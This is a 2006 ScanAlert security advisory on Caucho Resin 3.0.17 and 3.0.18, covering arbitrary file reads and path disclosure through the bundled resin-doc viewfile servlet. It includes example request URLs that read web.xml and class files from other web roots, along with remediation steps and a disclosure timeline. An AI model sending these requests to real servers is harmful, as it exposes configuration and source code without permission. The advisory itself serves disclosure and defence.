ScanAlert Security Advisory http://www.scanalert.com Caucho Resin Multiple Vulnerabilities - Arbitrary File Access & Information Disclosure Date: 5/16/06 Vendor: Caucho Package: Resin Version: 3.0.17 and 3.0.18 ? Vendor Confirmed Credit: ScanAlert?s Security and Enterprise Services Teams. Risk: Common Vulnerability Scoring System (CVSS) - http://www.first.org/cvss/intro/ Related Exploit Range: Remote Attack Complexity: Low Level Of Authentication Needed: Not Required Confidentiality Impact: Partial Integrity Impact: Partial Availability Impact: None Overview Caucho Resin is a high performance, Sun certified J2EE server featuring load balancing for increased reliability. Resin is well known for its flexibility and ease of use, saving both engineering time and staff costs. Vulnerabilities Resin contains documentation that is available in the /webapps directory and is an expanded war file available at /resin-doc by default when using the standard resin.conf and Resin directory structure for configuring the application. This documentation contains a servlet for viewing files within the integrated tutorial: http://targetsystem/resin-doc/viewfile/?contextpath=%2Fresin-doc%2Fjmx%2 Ftut orial%2Fbasic&servletpath=%2Findex.xtp&file=index.jsp&re-marker=&re-star t=&r e-end=#code-highlight The viewfile servlet can easily read any file within the web root with no parameters: http://targetsystem/resin-doc/viewfile/?file=index.jsp It is possible to set the context path outside of the resin-doc and read any file on alternate web roots: http://targetsystem/resin-doc/viewfile/?contextpath=/otherwebapp&servlet path =&file=WEB-INF/web.xml When resin-doc is installed on a system it is possible to read all files contained within the web root including class files which can then be decompiled to view the Java source: http://targetsystem/resin-doc/viewfile/?contextpath=/&servletpath=&file= WEB- INF/classes/com/webapp/app/target.class An incorrect path in the request will reveal the absolute installation path: File not found /C:/customer/sites/deploy/n/wwwroot/WEB-INF/classes/com/webapp/app/non-e xist ant.class Solution: Remove the resin-doc.war file from all production systems and do not deploy using default configuration files. Upgrade to version 3.0.19 or better. Resolution Timeline: Vendor Notification: May 5, 2006 Vendor Response: May 9, 2006 Vendor Fix: May 15, 2006 Coordinated public release of advisory: May 16, 2006 ------------------------------------------------------------------------ ---- -------------------------- ScanAlert's mission is to make the web safe from hackers. We make web sites secure from hackers and certify it to their customers via our patent pending HACKER SAFE® security certification technology. Our daily security audits and real-time certification enables consumers to know whether the sites where they shop are taking the necessary steps to safeguard their personal information from hackers. By alleviating consumers' fears of identity theft and credit card fraud, online merchants who earn HACKER SAFE certification consistently see substantial increases in online transactions For additional information regarding ScanAlert and the Hacker Safe program please contact: Joseph Pierini, CISSP| Director, Enterprise Services ScanAlert ( www.scanalert.com) 860 Napa Valley Corporate Way Suite R Napa, CA 94558 Phone: 877 302-9965 Int'l: 707 224-7656 Fax: 707 252-9626 Email: joep (at) scanalert (dot) com [email concealed]